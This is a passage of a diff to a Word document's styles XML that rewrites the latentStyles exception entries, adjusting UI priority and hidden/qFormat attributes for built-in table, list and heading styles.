-    <w:lsdException w:name="Light Grid" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 1" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 1" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 1" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 1" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 1" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 1" w:uiPriority="65"/>
-    <w:lsdException w:name="Revision" w:semiHidden="1"/>
-    <w:lsdException w:name="List Paragraph" w:uiPriority="34" w:qFormat="1"/>
-    <w:lsdException w:name="Quote" w:uiPriority="29" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Quote" w:uiPriority="30" w:qFormat="1"/>
-    <w:lsdException w:name="Medium List 2 Accent 1" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 1" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 1" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 1" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 1" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 1" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 1" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 1" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 2" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 2" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 2" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 2" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 2" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 2" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 2" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 2" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 2" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 2" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 2" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 2" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 2" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 2" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 3" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 3" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 3" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 3" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 3" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 3" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 3" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 3" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 3" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 3" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 3" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 3" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 3" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 3" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 4" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 4" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 4" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 4" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 4" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 4" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 4" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 4" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 4" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 4" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 4" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 4" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 4" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 4" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 5" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 5" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 5" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 5" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 5" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 5" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 5" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 5" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 5" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 5" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 5" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 5" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 5" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 5" w:uiPriority="73"/>
-    <w:lsdException w:name="Light Shading Accent 6" w:uiPriority="60"/>
-    <w:lsdException w:name="Light List Accent 6" w:uiPriority="61"/>
-    <w:lsdException w:name="Light Grid Accent 6" w:uiPriority="62"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 6" w:uiPriority="63"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 6" w:uiPriority="64"/>
-    <w:lsdException w:name="Medium List 1 Accent 6" w:uiPriority="65"/>
-    <w:lsdException w:name="Medium List 2 Accent 6" w:uiPriority="66"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 6" w:uiPriority="67"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 6" w:uiPriority="68"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 6" w:uiPriority="69"/>
-    <w:lsdException w:name="Dark List Accent 6" w:uiPriority="70"/>
-    <w:lsdException w:name="Colorful Shading Accent 6" w:uiPriority="71"/>
-    <w:lsdException w:name="Colorful List Accent 6" w:uiPriority="72"/>
-    <w:lsdException w:name="Colorful Grid Accent 6" w:uiPriority="73"/>
-    <w:lsdException w:name="Subtle Emphasis" w:uiPriority="19" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Emphasis" w:uiPriority="21" w:qFormat="1"/>
-    <w:lsdException w:name="Subtle Reference" w:uiPriority="31" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Reference" w:uiPriority="32" w:qFormat="1"/>
-    <w:lsdException w:name="Book Title" w:uiPriority="33" w:qFormat="1"/>
-    <w:lsdException w:name="Bibliography" w:semiHidden="1" w:uiPriority="37" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="TOC Heading" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1" w:qFormat="1"/>
-    <w:lsdException w:name="Plain Table 1" w:uiPriority="41"/>
-    <w:lsdException w:name="Plain Table 2" w:uiPriority="42"/>
-    <w:lsdException w:name="Plain Table 3" w:uiPriority="43"/>
-    <w:lsdException w:name="Plain Table 4" w:uiPriority="44"/>
-    <w:lsdException w:name="Plain Table 5" w:uiPriority="45"/>
-    <w:lsdException w:name="Grid Table Light" w:uiPriority="40"/>
-    <w:lsdException w:name="Grid Table 1 Light" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 1" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 1" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 1" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 1" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 1" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 1" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 1" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 2" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 2" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 2" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 2" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 2" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 2" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 2" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 3" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 3" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 3" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 3" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 3" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 3" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 3" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 4" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 4" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 4" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 4" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 4" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 4" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 4" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 5" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 5" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 5" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 5" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 5" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 5" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 5" w:uiPriority="52"/>
-    <w:lsdException w:name="Grid Table 1 Light Accent 6" w:uiPriority="46"/>
-    <w:lsdException w:name="Grid Table 2 Accent 6" w:uiPriority="47"/>
-    <w:lsdException w:name="Grid Table 3 Accent 6" w:uiPriority="48"/>
-    <w:lsdException w:name="Grid Table 4 Accent 6" w:uiPriority="49"/>
-    <w:lsdException w:name="Grid Table 5 Dark Accent 6" w:uiPriority="50"/>
-    <w:lsdException w:name="Grid Table 6 Colorful Accent 6" w:uiPriority="51"/>
-    <w:lsdException w:name="Grid Table 7 Colorful Accent 6" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 1" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 1" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 1" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 1" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 1" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 1" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 1" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 2" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 2" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 2" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 2" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 2" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 2" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 2" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 3" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 3" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 3" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 3" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 3" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 3" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 3" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 4" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 4" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 4" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 4" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 4" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 4" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 4" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 5" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 5" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 5" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 5" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 5" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 5" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 5" w:uiPriority="52"/>
-    <w:lsdException w:name="List Table 1 Light Accent 6" w:uiPriority="46"/>
-    <w:lsdException w:name="List Table 2 Accent 6" w:uiPriority="47"/>
-    <w:lsdException w:name="List Table 3 Accent 6" w:uiPriority="48"/>
-    <w:lsdException w:name="List Table 4 Accent 6" w:uiPriority="49"/>
-    <w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/>
-    <w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/>
-    <w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/>
+  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267">
+    <w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/>
+    <w:lsdException w:name="toc 1" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 2" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 3" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 4" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 5" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 6" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 7" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 8" w:uiPriority="39"/>
+    <w:lsdException w:name="toc 9" w:uiPriority="39"/>
+    <w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/>
+    <w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/>
+    <w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Table Grid" w:semiHidden="0" w:uiPriority="39" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Revision" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
